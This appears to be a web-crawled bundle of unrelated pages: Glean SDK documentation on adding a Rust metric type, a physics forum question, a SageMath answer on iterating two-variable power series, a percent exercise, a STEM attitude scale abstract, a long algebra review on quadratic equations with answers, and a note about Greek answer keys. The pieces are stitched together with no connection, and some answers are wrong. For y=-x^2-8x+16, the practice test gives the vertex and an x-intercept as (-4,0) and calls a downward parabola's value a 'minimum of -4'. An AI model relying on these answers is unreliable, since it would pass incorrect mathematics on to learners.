https://mozilla.github.io/glean/book/dev/core/new-metric-type.html
# Adding a new metric type

Data in the Glean SDK is stored in so-called metrics. You can find the full list of implemented metric types in the user overview. Adding a new metric type involves defining the metric type's API, its persisted and in-memory storage, as well as its serialization into the ping payload.

## The metric type's API

A metric type implementation is defined in its own file under `glean-core/src/metrics/`, e.g. `glean-core/src/metrics/counter.rs` for a Counter. Start by defining a structure to hold the metric's metadata:

```rust
#[derive(Clone, Debug)]
pub struct CounterMetric {
    meta: CommonMetricData
}
```

Implement the `MetricType` trait to create a metric from the metadata as well as expose the metadata. This also gives you a `should_record` method on the metric type.

```rust
impl MetricType for CounterMetric {
    fn meta(&self) -> &CommonMetricData {
        &self.meta
    }

    fn meta_mut(&mut self) -> &mut CommonMetricData {
        &mut self.meta
    }
}
```

Its implementation should have a way to create a new metric from the common metric data. It should be the same for all metric types.

```rust
impl CounterMetric {
    pub fn new(meta: CommonMetricData) -> Self {
        Self { meta }
    }
}
```

Implement each method for the type. The first argument to accept should always be `glean: &Glean`, that is: a reference to the `Glean` object, used to access the storage:

```rust
impl CounterMetric { // same block as above
    pub fn add(&self, glean: &Glean, amount: i32) {
        // Always include this check!
        if !self.should_record() {
            return;
        }

        // Do error handling here

        glean
            .storage()
            .record_with(&self.meta, |old_value| match old_value {
                Some(Metric::Counter(old_value)) => Metric::Counter(old_value + amount),
                _ => Metric::Counter(amount),
            })
    }
}
```

Use `glean.storage().record()` to record a fixed value or `glean.storage().record_with()` to construct a new value from the currently stored one. The storage operation makes use of the metric's variant of the `Metric` enumeration.
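The record-or-update pattern that `record_with` implements can be sketched in a few lines outside of Rust. The following is a minimal, hypothetical Python stand-in (the dict-backed store and helper names are illustrative, not Glean's actual API):

```python
# Minimal, hypothetical stand-in for the storage's record_with():
# build the new stored value from the currently stored one, the way
# CounterMetric::add does. A plain dict replaces Glean's real storage.
store = {}

def record_with(store, key, update):
    """Replace the value under `key` with update(old_value)."""
    store[key] = update(store.get(key))

def counter_add(store, key, amount):
    # Mirrors the Counter match arms: add to an existing value,
    # otherwise start counting from the given amount.
    record_with(store, key, lambda old: old + amount if old is not None else amount)

counter_add(store, "clicks", 2)
counter_add(store, "clicks", 3)
# store["clicks"] is now 5
```

The closure-based update is what lets each metric type define its own accumulation rule while the storage layer stays generic.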
## The `Metric` enumeration

Persistence, in-memory serialization, and ping payload serialization are handled through the `Metric` enumeration. This is defined in `glean-core/src/metrics/mod.rs`. Variants of this enumeration are used in the storage implementation of the metric type.

To add a new metric type, include the metric module and declare its use, then add a new variant to the `Metric` enum:

```rust
mod counter;

// ...

pub use self::counter::CounterMetric;

#[derive(Serialize, Deserialize, Debug, Clone)]
pub enum Metric {
    // ...
    Counter(i32),
}
```

Then modify the below implementation and define the right ping section name for the new type. This will be used in the ping payload:

```rust
impl Metric {
    pub fn ping_section(&self) -> &'static str {
        match self {
            // ...
            Metric::Counter(_) => "counter",
        }
    }
}
```

Finally, define the ping payload serialization (as JSON). In the simple cases where the in-memory representation maps to its JSON representation, it is enough to call the `json!` macro.

```rust
impl Metric { // same block as above
    pub fn as_json(&self) -> JsonValue {
        match self {
            // ...
            Metric::Counter(c) => json!(c),
        }
    }
}
```

For more complex serialization, consider implementing the serialization logic as a function returning a `serde_json::Value` or another object that can be serialized. For example, the `Datetime` serializer has the following entry, where `get_iso_time_string` is a function to convert from the `Datetime` metric representation to a string:

```rust
Metric::Datetime(d, time_unit) => json!(get_iso_time_string(*d, *time_unit)),
```

In the next step we will create the FFI wrapper and platform-specific wrappers.
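How `ping_section()` and `as_json()` combine into a payload can be illustrated with a small sketch. This is a hypothetical Python model of the grouping, not Glean's code; the triple layout and `assemble_ping` name are assumptions for illustration:

```python
import json

# Hypothetical sketch of how per-metric section names and JSON values
# are grouped into a ping payload: each stored metric contributes its
# value under its section, keyed by its identifier.
def assemble_ping(stored):
    # stored: list of (section, metric_id, json_ready_value) triples
    payload = {}
    for section, metric_id, value in stored:
        payload.setdefault(section, {})[metric_id] = value
    return json.dumps(payload, sort_keys=True)

print(assemble_ping([
    ("counter", "browser.clicks", 5),
    ("datetime", "app.first_run", "2020-03-31T00:05:46+00:00"),
]))
```

The point is the two-level structure: the section name chosen in `ping_section()` becomes the outer key, and the value produced by `as_json()` sits beneath it.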
2020-03-31 00:05:46
https://www.physicsforums.com/threads/number-of-weighted-vacuum-feynman-diagrams.611561/
# Homework Help: Number of weighted vacuum Feynman diagrams

1. Jun 5, 2012

### th13

I didn't know where to put this, because it isn't homework or coursework I have to do, just something I'm trying to understand. Anyway, I have attached the problem as an image. We have a scalar quartic Lagrangian in d dimensions. It says that the number of vacuum Feynman diagrams at a given order λ^k, weighted by their statistical factors, should depend on the number of dimensions d. While I understand what the "statistical factor" is, i.e. the number of ways to join the vertices of a given diagram, I can't figure out how it could depend on the number of space-time dimensions d. Any suggestions? Thank you, and sorry for my English.
2018-06-21 20:38:21
https://ask.sagemath.org/question/39960/how-can-i-recurse-a-power-series-in-two-variables/?sort=votes
# How can I recurse a power series in two variables?

I would very much like to express, for example,

    R.<x, y> = PowerSeriesRing(QQ, default_prec = 20)
    g(x, g(x, g(x, x)))

or

    f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, f(x, y))))))))))))))).expand()

in a more elegant way, for a specified number of self-compositions in one variable. I have only been able to find the Sage function for composition of one-variable polynomials, not for nesting two-variable power series.

Comments:

- Could you provide a definition of f and g that one could use to explore your question? (2017-12-06 08:29:35 +0200)
- Note: with R as in the question, R.random_element() gave a starting point for exploration. (2017-12-08 16:03:27 +0200)
- In general though, providing a working example helps other Ask Sage users to explore a question. This question had g(x, g(x, g(x, x))) but no definition of g to make that work. (2017-12-08 16:06:39 +0200)

## Answer

Defining a function would give you a nice syntax for this kind of iteration. For example, let us define right_iterate as follows.

    def right_iterate(n, g):
        x, y = g.parent().gens()
        gg = y
        for k in range(n):
            gg = g(x, gg)
        return gg

Suppose we defined

    sage: g = x*y^3 + x^3*y^11 - 1/21*x^11*y^5 - 2/5*x^3*y^13 + O(x, y)^60

Then instead of

    sage: g(x, g(x, g(x, y)))
    x^13*y^27 + 9*x^15*y^35 - 3/7*x^23*y^29 - 18/5*x^15*y^37 - 1/7*x^25*y^33 + O(x, y)^60

one can write

    sage: right_iterate(3, g)
    x^13*y^27 + 9*x^15*y^35 - 3/7*x^23*y^29 - 18/5*x^15*y^37 - 1/7*x^25*y^33 + O(x, y)^60

and instead of

    sage: g(x, g(x, g(x, x)))
    x^40 + 9*x^50 - 141/35*x^52 - 1/7*x^58 + O(x, y)^60

one can write

    sage: right_iterate(3, g)(x, x)
    x^40 + 9*x^50 - 141/35*x^52 - 1/7*x^58 + O(x, y)^60

Of course, you could modify the function to directly use (x, x) if you always want that.
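The same iteration pattern works outside Sage on ordinary callables. A minimal plain-Python sketch (the function names are hypothetical, chosen to mirror the Sage answer):

```python
def right_iterate(n, g, x):
    # Return the function y -> g(x, g(x, ... g(x, y) ...)) with n copies
    # of g, composing g in its second argument only.
    def composed(y):
        for _ in range(n):
            y = g(x, y)
        return y
    return composed

# Example: g(x, y) = x*y + 1 iterated three times at x = 2:
g = lambda x, y: x * y + 1
# g(2, g(2, g(2, 0))) = g(2, g(2, 1)) = g(2, 3) = 7
```

The closure avoids writing out the nested calls by hand, exactly as `right_iterate` does for power series.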
2021-09-16 16:03:53
https://www.gradesaver.com/textbooks/math/applied-mathematics/elementary-technical-mathematics/chapter-1-section-1-14-rate-base-and-part-exercises-page-84/25
## Elementary Technical Mathematics

Published by Brooks Cole

# Chapter 1 - Section 1.14 - Rate, Base, and Part - Exercises: 25

36.9%

#### Work Step by Step

The part is 24 hours. The base is 65 hours, the number following "of". The rate is unknown. $R=\frac{P}{B}=\frac{24}{65}=0.3692$ To convert the decimal to a percent, move the decimal point two places to the right and round to the nearest tenth: $0.3692\approx36.9\%$
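The rate-base-part arithmetic above can be checked directly; a quick sketch:

```python
# Rate = Part / Base, expressed as a percent rounded to the nearest tenth.
part, base = 24, 65
rate = part / base            # 0.3692...
percent = round(rate * 100, 1)
print(percent)  # 36.9
```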
2018-07-22 20:36:49
http://dergipark.gov.tr/ijemst/issue/39894/509258
## Development of STEM Attitude Scale for Secondary School Students: Validity and Reliability Study

#### Ibrahim Benek [1], Behiye Akcay [2]

The aim of this study is to develop a valid and reliable attitude scale that can measure secondary school students' attitudes towards Science, Technology, Engineering and Mathematics (STEM). The study was conducted in the 2017-2018 academic year with 2500 secondary school students in the 5th, 6th, 7th and 8th grades from fifteen secondary schools in ten provinces across seven regions of Turkey. The study was designed according to the survey method, a descriptive research method, and the sample was selected by stratified sampling. Exploratory Factor Analysis (EFA) and Confirmatory Factor Analysis (CFA) were performed to test the validity of the scale's structure. In the EFA, the KMO value was .919 and Bartlett's test χ² value was 26236.010 (p < .001). As a result of the CFA conducted to determine the model fit of the scale, the chi-square fit value of the factor structure consisting of 33 items and 6 sub-factors (χ² = 4083.21, Sd = 480, p = .00) was found to be significant, with RMSEA: .0548, RMR: .0486, SRMR: .0486, GFI: .902, AGFI: .885, IFI: .902, NFI: .890, NNFI: .892 and CFI: .902. Since all fit values are within acceptable limits, it is concluded that the six-factor structure of the scale is a usable, valid model. Internal consistency and test-retest reliability analyses were performed to determine the reliability of the scale. The Cronbach's alpha (α) internal consistency reliability of the scale was 0.887 and the test-retest reliability was 0.804, so the scale can be said to be highly reliable.
It is concluded that the scale consisting of 33 items and six factors is a valid and reliable tool for determining middle school students' attitudes toward STEM.

Keywords: STEM, Scale, Validity, Reliability

- Benek, I. & Akcay, B. (2019). Development of STEM attitude scale for secondary school students: Validity and reliability study. International Journal of Education in Mathematics, Science and Technology (IJEMST), 7(1), 32-52. DOI: 10.18404/ijemst.509258
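Cronbach's alpha, the internal-consistency statistic reported above, is straightforward to compute from item scores. A minimal sketch (illustrative only, not the authors' analysis code):

```python
def cronbach_alpha(items):
    # items: one list of scores per scale item, respondents in the same order.
    # alpha = k/(k-1) * (1 - sum of item variances / variance of total scores)
    k = len(items)
    totals = [sum(scores) for scores in zip(*items)]

    def var(xs):  # sample variance
        m = sum(xs) / len(xs)
        return sum((x - m) ** 2 for x in xs) / (len(xs) - 1)

    return k / (k - 1) * (1 - sum(var(it) for it in items) / var(totals))

# Two perfectly consistent items give alpha = 1:
print(cronbach_alpha([[1, 2, 3], [1, 2, 3]]))
```

Values near 1 indicate high internal consistency; the 0.887 reported for the 33-item scale falls in the range usually read as highly reliable.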
2019-01-24 02:14:22
https://au.mathematicstip.com/8341-19e-review-exercises-2.html
# 19.E: Review Exercises 2

## Chapter Review Exercises

### Solve Quadratic Equations Using the Square Root Property

Exercise \(\PageIndex{1}\) Solve Quadratic Equations of the Form \(ax^{2}=k\) Using the Square Root Property

In the following exercises, solve using the Square Root Property.

1. \(y^{2}=144\)
2. \(n^{2}-80=0\)
3. \(4 a^{2}=100\)
4. \(2 b^{2}=72\)
5. \(r^{2}+32=0\)
6. \(t^{2}+18=0\)
7. \(\frac{2}{3} w^{2}-20=30\)
8. \(5 c^{2}+3=19\)

Answers:

1. \(y=\pm 12\)
3. \(a=\pm 5\)
5. \(r=\pm 4 \sqrt{2} i\)
7. \(w=\pm 5 \sqrt{3}\)

Exercise \(\PageIndex{2}\) Solve Quadratic Equations of the Form \(a(x-h)^{2}=k\) Using the Square Root Property

In the following exercises, solve using the Square Root Property.

1. \((p-5)^{2}+3=19\)
2. \((u+1)^{2}=45\)
3. \(\left(x-\frac{1}{4}\right)^{2}=\frac{3}{16}\)
4. \(\left(y-\frac{2}{3}\right)^{2}=\frac{2}{9}\)
5. \((n-4)^{2}-50=150\)
6. \((4 c-1)^{2}=-18\)
7. \(n^{2}+10 n+25=12\)
8. \(64 a^{2}+48 a+9=81\)

Answers:

1. \(p=1, 9\)
3. \(x=\frac{1}{4} \pm \frac{\sqrt{3}}{4}\)
5. \(n=4 \pm 10 \sqrt{2}\)
7. \(n=-5 \pm 2 \sqrt{3}\)

### Solve Quadratic Equations by Completing the Square

Exercise \(\PageIndex{3}\) Solve Quadratic Equations Using Completing the Square

In the following exercises, complete the square to make a perfect square trinomial. Then write the result as a binomial squared.

1. \(x^{2}+22 x\)
2. \(m^{2}-8 m\)
3. \(a^{2}-3 a\)
4. \(b^{2}+13 b\)

Answers:

1. \((x+11)^{2}\)
3. \(\left(a-\frac{3}{2}\right)^{2}\)

Exercise \(\PageIndex{4}\) Solve Quadratic Equations Using Completing the Square

In the following exercises, solve by completing the square.

1. \(d^{2}+14 d=-13\)
2. \(y^{2}-6 y=36\)
3. \(m^{2}+6 m=-109\)
4. \(t^{2}-12 t=-40\)
5. \(v^{2}-14 v=-31\)
6. \(w^{2}-20 w=100\)
7. \(m^{2}+10 m-4=-13\)
8. \(n^{2}-6 n+11=34\)
9. \(a^{2}=3 a+8\)
10. \(b^{2}=11 b-5\)
11. \((u+8)(u+4)=14\)
12. \((z-10)(z+2)=28\)

Answers:

1. \(d=-13,-1\)
3. \(m=-3 \pm 10 i\)
5. \(v=7 \pm 3 \sqrt{2}\)
7. \(m=-9,-1\)
9. \(a=\frac{3}{2} \pm \frac{\sqrt{41}}{2}\)
11.
\(u=-6 \pm 3 \sqrt{2}\)

### Solve Quadratic Equations of the Form \(ax^{2}+bx+c=0\) by Completing the Square

Exercise \(\PageIndex{5}\) Solve Quadratic Equations of the Form \(ax^{2}+bx+c=0\) by Completing the Square

In the following exercises, solve by completing the square.

1. \(3 p^{2}-18 p+15=15\)
2. \(5 q^{2}+70 q+20=0\)
3. \(4 y^{2}-6 y=4\)
4. \(2 x^{2}+2 x=4\)
5. \(3 c^{2}+2 c=9\)
6. \(4 d^{2}-2 d=8\)
7. \(2 x^{2}+6 x=-5\)
8. \(2 x^{2}+4 x=-5\)

Answers:

1. \(p=0,6\)
3. \(y=-\frac{1}{2}, 2\)
5. \(c=-\frac{1}{3} \pm \frac{2 \sqrt{7}}{3}\)
7. \(x=-\frac{3}{2} \pm \frac{1}{2} i\)

Exercise \(\PageIndex{6}\) Solve Quadratic Equations Using the Quadratic Formula

In the following exercises, solve by using the Quadratic Formula.

1. \(4 x^{2}-5 x+1=0\)
2. \(7 y^{2}+4 y-3=0\)
3. \(r^{2}-r-42=0\)
4. \(t^{2}+13 t+22=0\)
5. \(4 v^{2}+v-5=0\)
6. \(2 w^{2}+9 w+2=0\)
7. \(3 m^{2}+8 m+2=0\)
8. \(5 n^{2}+2 n-1=0\)
9. \(6 a^{2}-5 a+2=0\)
10. \(4 b^{2}-b+8=0\)
11. \(u(u-10)+3=0\)
12. \(5 z(z-2)=3\)
13. \(\frac{1}{8} p^{2}-\frac{1}{5} p=-\frac{1}{20}\)
14. \(\frac{2}{5} q^{2}+\frac{3}{10} q=\frac{1}{10}\)
15. \(4 c^{2}+4 c+1=0\)
16. \(9 d^{2}-12 d=-4\)

Answers:

1. \(x=\frac{1}{4}, 1\)
3. \(r=-6,7\)
5. \(v=-\frac{5}{4}, 1\)
7. \(m=\frac{-4 \pm \sqrt{10}}{3}\)
9. \(a=\frac{5}{12} \pm \frac{\sqrt{23}}{12} i\)
11. \(u=5 \pm \sqrt{22}\)
13. \(p=\frac{4 \pm \sqrt{6}}{5}\)
15. \(c=-\frac{1}{2}\)

Exercise \(\PageIndex{7}\) Use the Discriminant to Predict the Number of Solutions of a Quadratic Equation

In the following exercises, determine the number of solutions for each quadratic equation.

1. \(9 x^{2}-6 x+1=0\)
2. \(3 y^{2}-8 y+1=0\)
3. \(7 m^{2}+12 m+4=0\)
4. \(5 n^{2}-n+1=0\)

and

1. \(5 x^{2}-7 x-8=0\)
2. \(7 x^{2}-10 x+5=0\)
3. \(25 x^{2}-90 x+81=0\)
4. \(15 x^{2}-8 x+4=0\)

Answers (first group):

1. \(1\)
2. \(2\)
3. \(2\)
4. \(2\)

Exercise \(\PageIndex{8}\) Identify the Most Appropriate Method to Use to Solve a Quadratic Equation

In the following exercises, identify the most appropriate method (Factoring, Square Root, or Quadratic Formula) to use to solve each quadratic equation. Do not solve.

1. \(16 r^{2}-8 r+1=0\)
2. \(5 t^{2}-8 t+3=9\)
3. \(3(c+2)^{2}=15\)

and

1. \(4 d^{2}+10 d-5=21\)
2. \(25 x^{2}-60 x+36=0\)
3. \(6(5 v-7)^{2}=150\)

Answers (first group):

1. Factoring
3. Square Root

### Solve Equations in Quadratic Form

Exercise \(\PageIndex{9}\) Solve Equations in Quadratic Form

In the following exercises, solve.

1. \(x^{4}-14 x^{2}+24=0\)
2. \(x^{4}+4 x^{2}-32=0\)
3. \(4 x^{4}-5 x^{2}+1=0\)
4. \((2 y+3)^{2}+3(2 y+3)-28=0\)
5. \(x+3 \sqrt{x}-28=0\)
6. \(6 x+5 \sqrt{x}-6=0\)
7. \(x^{\frac{2}{3}}-10 x^{\frac{1}{3}}+24=0\)
8. \(x+7 x^{\frac{1}{2}}+6=0\)
9. \(8 x^{-2}-2 x^{-1}-3=0\)

Answers:

1. \(x=\pm \sqrt{2}, x=\pm 2 \sqrt{3}\)
3. \(x=\pm 1, x=\pm \frac{1}{2}\)
5. \(x=16\)
7. \(x=64, x=216\)
9. \(x=-2, x=\frac{4}{3}\)

### Solve Applications of Quadratic Equations

Exercise \(\PageIndex{10}\) Solve Applications Modeled by Quadratic Equations

In the following exercises, solve by using the method of factoring, the square root principle, or the Quadratic Formula. Round your answers to the nearest tenth, if needed.

1. Find two consecutive odd numbers whose product is \(323\).
2. Find two consecutive even numbers whose product is \(624\).
3. A triangular banner has an area of \(351\) square centimeters. The length of the base is two centimeters longer than four times the height. Find the height and length of the base.
4. Julius built a triangular display case for his coin collection. The height of the display case is six inches less than twice the width of the base. The area of the back of the case is \(70\) square inches. Find the height and width of the case.
5. A tile mosaic in the shape of a right triangle is used as the corner of a rectangular pathway. The hypotenuse of the mosaic is \(5\) feet. One side of the mosaic is twice as long as the other side. What are the lengths of the sides? Round to the nearest tenth. (Figure 9.E.1)
6. A rectangular piece of plywood has a diagonal which measures two feet more than the width. The length of the plywood is twice the width. What is the length of the plywood’s diagonal? Round to the nearest tenth.
7. The front walk from the street to Pam’s house has an area of \(250\) square feet. Its length is two less than four times its width.
Find the length and width of the sidewalk. Round to the nearest tenth.
8. For Sophia’s graduation party, several tables of the same width will be arranged end to end to give a serving table with a total area of \(75\) square feet. The total length of the tables will be two more than three times the width. Find the length and width of the serving table so Sophia can purchase the correct size tablecloth. Round to the nearest tenth.
9. A ball is thrown vertically in the air with a velocity of \(160\) ft/sec. Use the formula \(h=-16 t^{2}+v_{0} t\) to determine when the ball will be \(384\) feet from the ground. Round to the nearest tenth.
10. A couple took a small airplane for a quick flight up to the wine country for a romantic dinner and then returned home. The plane flew a total of \(5\) hours and the trip was \(360\) miles each way. If the plane was flying at \(150\) mph, what was the speed of the wind that affected the plane?
11. Ezra kayaked up the river and then back in a total time of \(6\) hours. The trip was \(4\) miles each way and the current was difficult. If Ezra kayaked at a speed of \(5\) mph, what was the speed of the current?
12. Two handymen can do a home repair in \(2\) hours if they work together. One of the men takes \(3\) hours more than the other man to finish the job by himself. How long does it take for each handyman to do the home repair individually?

Answers:

2. The two consecutive even numbers whose product is \(624\) are \(24\) and \(26\), and \(-24\) and \(-26\).
4. The height is \(14\) inches and the width is \(10\) inches.
6. The length of the diagonal is \(3.6\) feet.
8. The width of the serving table is \(4.7\) feet and the length is \(16.1\) feet.
10. The speed of the wind was \(30\) mph.
12. One man takes \(3\) hours and the other man \(6\) hours to finish the repair alone.

### Graph Quadratic Functions Using Properties

Exercise \(\PageIndex{11}\) Recognize the Graph of a Quadratic Function

In the following exercises, graph by plotting points.

1. Graph \(y=x^{2}-2\)
2. Graph \(y=-x^{2}+3\)

Answer: 2. (graph not shown)
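The solution methods reviewed above (Square Root Property, completing the square, Quadratic Formula) all reduce to the discriminant deciding the solution type. A short sketch combining the Quadratic Formula with the discriminant check:

```python
def solve_quadratic(a, b, c):
    # Quadratic Formula for a x^2 + b x + c = 0; the discriminant
    # b^2 - 4ac decides whether there are 2, 1, or no real solutions.
    d = b * b - 4 * a * c
    if d > 0:
        r = d ** 0.5
        return ((-b + r) / (2 * a), (-b - r) / (2 * a))
    if d == 0:
        return (-b / (2 * a),)
    return ()  # two complex solutions; none real

# r^2 - r - 42 = 0, as in the Quadratic Formula exercises:
print(solve_quadratic(1, -1, -42))  # (7.0, -6.0)
```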
Exercise \(\PageIndex{12}\) Recognize the Graph of a Quadratic Function

In the following exercises, determine if the following parabolas open up or down.

1. \(y=-3 x^{2}+3 x-1\)
2. \(y=5 x^{2}+6 x+3\)

and

1. \(y=x^{2}+8 x-1\)
2. \(y=-4 x^{2}-7 x+1\)

Answers (second group):

1. Up
2. Down

Exercise \(\PageIndex{13}\) Find the Axis of Symmetry and Vertex of a Parabola

In the following exercises, find

1. The equation of the axis of symmetry
2. The vertex

for:

1. \(y=-x^{2}+6 x+8\)
2. \(y=2 x^{2}-8 x+1\)

Answer:

2. \(x=2\); \((2,-7)\)

Exercise \(\PageIndex{14}\) Find the Intercepts of a Parabola

In the following exercises, find the \(x\)- and \(y\)-intercepts.

1. \(y=x^{2}-4x+5\)
2. \(y=x^{2}-8x+15\)
3. \(y=x^{2}-4x+10\)
4. \(y=-5x^{2}-30x-46\)
5. \(y=16x^{2}-8x+1\)
6. \(y=x^{2}+16x+64\)

Answers:

2. \(y\): \((0,15)\); \(x\): \((3,0), (5,0)\)
4. \(y\): \((0,-46)\); \(x\): none
6. \(y\): \((0,64)\); \(x\): \((-8,0)\)

#### Graph Quadratic Functions Using Properties

Exercise \(\PageIndex{15}\) Graph Quadratic Functions Using Properties

In the following exercises, graph each function by using its properties.

1. \(y=x^{2}+8 x+15\)
2. \(y=x^{2}-2 x-3\)
3. \(y=-x^{2}+8 x-16\)
4. \(y=4 x^{2}-4 x+1\)
5. \(y=x^{2}+6 x+13\)
6. \(y=-2 x^{2}-8 x-12\)

Answers: 2., 4., 6. (graphs not shown)

Exercise \(\PageIndex{16}\) Solve Maximum and Minimum Applications

In the following exercises, find the minimum or maximum value.

1. \(y=7 x^{2}+14 x+6\)
2. \(y=-3 x^{2}+12 x-10\)

Answer:

2. The maximum value is \(2\) when \(x=2\).

Exercise \(\PageIndex{17}\) Solve Maximum and Minimum Applications

In the following exercises, solve. Round answers to the nearest tenth.

1. A ball is thrown upward from the ground with an initial velocity of \(112\) ft/sec. Use the quadratic equation \(h=-16 t^{2}+112 t\) to find how long it will take the ball to reach maximum height, and then find the maximum height.
2. A daycare facility is enclosing a rectangular area along the side of their building for the children to play outdoors. They need to maximize the area using \(180\) feet of fencing on three sides of the yard.
The quadratic equation \(A=-2 x^{2}+180 x\) gives the area, \(A\), of the yard for the length, \(x\), of the building that will border the yard. Find the length of the building that should border the yard to maximize the area, and then find the maximum area.

Answer:

2. The length adjacent to the building is \(90\) feet, giving a maximum area of \(4,050\) square feet.

### Graph Quadratic Functions Using Transformations

Exercise \(\PageIndex{18}\) Graph Quadratic Functions of the Form \(f(x)=x^{2}+k\)

In the following exercises, graph each function using a vertical shift.

1. \(g(x)=x^{2}+4\)
2. \(h(x)=x^{2}-3\)

Answer: 2. (graph not shown)

Exercise \(\PageIndex{19}\) Graph Quadratic Functions of the Form \(f(x)=(x-h)^{2}\)

In the following exercises, graph each function using a horizontal shift.

1. \(f(x)=(x+1)^{2}\)
2. \(g(x)=(x-3)^{2}\)

Answer: 2. (graph not shown)

Exercise \(\PageIndex{20}\) Graph Quadratic Functions of the Form \(f(x)=a(x-h)^{2}+k\)

In the following exercises, graph each function using transformations.

1. \(f(x)=(x+2)^{2}+3\)
2. \(f(x)=(x+3)^{2}-2\)
3. \(f(x)=(x-1)^{2}+4\)
4. \(f(x)=(x-4)^{2}-3\)

Answers: 2., 4. (graphs not shown)

Exercise \(\PageIndex{21}\) Graph Quadratic Functions of the Form \(f(x)=ax^{2}\)

In the following exercises, graph each function.

1. \(f(x)=2x^{2}\)
2. \(f(x)=-x^{2}\)
3. \(f(x)=\frac{1}{2} x^{2}\)

Answer: 2. (graph not shown)

Exercise \(\PageIndex{22}\) Graph Quadratic Functions Using Transformations

In the following exercises, rewrite each function in the \(f(x)=a(x-h)^{2}+k\) form by completing the square.

1. \(f(x)=2 x^{2}-4 x-4\)
2. \(f(x)=3 x^{2}+12 x+8\)

Answer:

1. \(f(x)=2(x-1)^{2}-6\)

Exercise \(\PageIndex{23}\) Graph Quadratic Functions Using Transformations

In the following exercises,

1. Rewrite each function in \(f(x)=a(x-h)^{2}+k\) form
2. Graph it by using transformations

1. \(f(x)=3 x^{2}-6 x-1\)
2. \(f(x)=-2 x^{2}-12 x-5\)
3. \(f(x)=2 x^{2}+4 x+6\)
4. \(f(x)=3 x^{2}-12 x+7\)

Answers:

1. \(f(x)=3(x-1)^{2}-4\); graph: Figure 9.E.13
3. \(f(x)=2(x+1)^{2}+4\); graph: Figure 9.E.14

Exercise \(\PageIndex{24}\) Graph Quadratic Functions Using Transformations

In the following exercises,

1.
Rewrite each function in \(f(x)=a(x-h)^{2}+k\) form
2. Graph it using properties

1. \(f(x)=-3 x^{2}-12 x-5\)
2. \(f(x)=2 x^{2}-12 x+7\)

Answer:

1. \(f(x)=-3(x+2)^{2}+7\); graph: Figure 9.E.15

Exercise \(\PageIndex{25}\) Find a Quadratic Function From its Graph

In the following exercises, write the quadratic function in \(f(x)=a(x-h)^{2}+k\) form.

1. Figure 9.E.16
2. Figure 9.E.17

Answer:

1. \(f(x)=(x+1)^{2}-5\)

Exercise \(\PageIndex{26}\) Solve Quadratic Inequalities Graphically

In the following exercises, solve graphically and write the solution in interval notation.

1. \(x^{2}-x-6>0\)
2. \(x^{2}+4 x+3 \leq 0\)
3. \(-x^{2}-x+2 \geq 0\)
4. \(-x^{2}+2 x+3<0\)

Answers:

1. Figure 9.E.18; \((-\infty,-2) \cup (3, \infty)\)
3. Figure 9.E.19; \([-2,1]\)

Exercise \(\PageIndex{27}\) Solve Quadratic Inequalities Algebraically

In the following exercises, solve each inequality algebraically and write any solution in interval notation.

1. \(x^{2}-6 x+8<0\)
2. \(x^{2}+x>12\)
3. \(x^{2}-6 x+4 \leq 0\)
4. \(2 x^{2}+7 x-4>0\)
5. \(-x^{2}+x-6>0\)
6. \(x^{2}-2 x+4 \geq 0\)

Answers:

1. \((2,4)\)
3. \([3-\sqrt{5}, 3+\sqrt{5}]\)
5. no solution

## Practice Test

Exercise \(\PageIndex{28}\)

1. Use the Square Root Property to solve the quadratic equation \(3(w+5)^{2}=27\).
2. Use Completing the Square to solve the quadratic equation \(a^{2}-8 a+7=23\).
3. Use the Quadratic Formula to solve the quadratic equation \(2 m^{2}-5 m+3=0\).

Answers:

1. \(w=-2, w=-8\)
3. \(m=1, m=\frac{3}{2}\)

Exercise \(\PageIndex{29}\)

Solve the following quadratic equations. Use any method.

1. \(2 x(3 x-2)-1=0\)
2. \(\frac{9}{4} y^{2}-3 y+1=0\)

Answer:

2. \(y=\frac{2}{3}\)

Exercise \(\PageIndex{30}\)

Use the discriminant to determine the number and type of solutions of each quadratic equation.

1. \(6 p^{2}-13 p+7=0\)
2. \(3 q^{2}-10 q+12=0\)

Answer:

2. \(2\) complex

Exercise \(\PageIndex{31}\)

Solve each equation.

1. \(4 x^{4}-17 x^{2}+4=0\)
2. \(y^{\frac{2}{3}}+2 y^{\frac{1}{3}}-3=0\)

Answer:

2. \(y=1, y=-27\)

Exercise \(\PageIndex{32}\)

For each parabola, find

1. Which direction it opens
2. The equation of the axis of symmetry
3. The vertex
4. The \(x\)- and \(y\)-intercepts
5.
The maximum or minimum value

1. \(y=3 x^{2}+6 x+8\)
2. \(y=-x^{2}-8 x+16\)

Answer:

2.
1. down
2. \(x=-4\)
3. \((-4,0)\)
4. \(y\): \((0,16)\); \(x\): \((-4,0)\)
5. minimum value of \(-4\) when \(x=0\)

Exercise \(\PageIndex{33}\)

Graph each quadratic function using intercepts, the vertex, and the equation of the axis of symmetry.

1. \(f(x)=x^{2}+6 x+9\)
2. \(f(x)=-2 x^{2}+8 x+4\)

Answer: 2. (graph not shown)

Exercise \(\PageIndex{34}\)

In the following exercises, graph each function using transformations.

1. \(f(x)=(x+3)^{2}+2\)
2. \(f(x)=x^{2}-4 x-1\)

Answer: 2. Figure 9.E.21

Exercise \(\PageIndex{35}\)

In the following exercises, solve each inequality algebraically and write any solution in interval notation.

1. \(x^{2}-6 x-8 \leq 0\)
2. \(2 x^{2}+x-10>0\)

Answer:

2. \(\left(-\infty,-\frac{5}{2}\right) \cup (2, \infty)\)

Exercise \(\PageIndex{36}\)

Model the situation with a quadratic equation and solve by any method.

1. Find two consecutive even numbers whose product is \(360\).
2. The length of a diagonal of a rectangle is three more than the width. The length of the rectangle is three times the width. Find the length of the diagonal. (Round to the nearest tenth.)
3. A water balloon is launched upward at the rate of \(86\) ft/sec. Using the formula \(h=-16 t^{2}+86 t\), find how long it will take the balloon to reach the maximum height, and then find the maximum height. Round to the nearest tenth.

## Answer Keys to H. Hansen and G. Quinn, Greek: An Intensive Course

Answer keys to H. Hansen and G. Quinn, Greek: An Intensive Course. 2nd revised ed. Fordham UP, 1992.

I created these keys while teaching ancient Greek for the first time at Duke University during the 2003–2004 academic year. Since then I have used them as student aids in summer Greek courses at the University of Arizona. I am posting them here in the hope that they will prove useful for students encountering Hansen and Quinn for the first time, whether in a classroom or on their own. They are intended to provide guidance to those with questions about the material, but not to help cheaters.
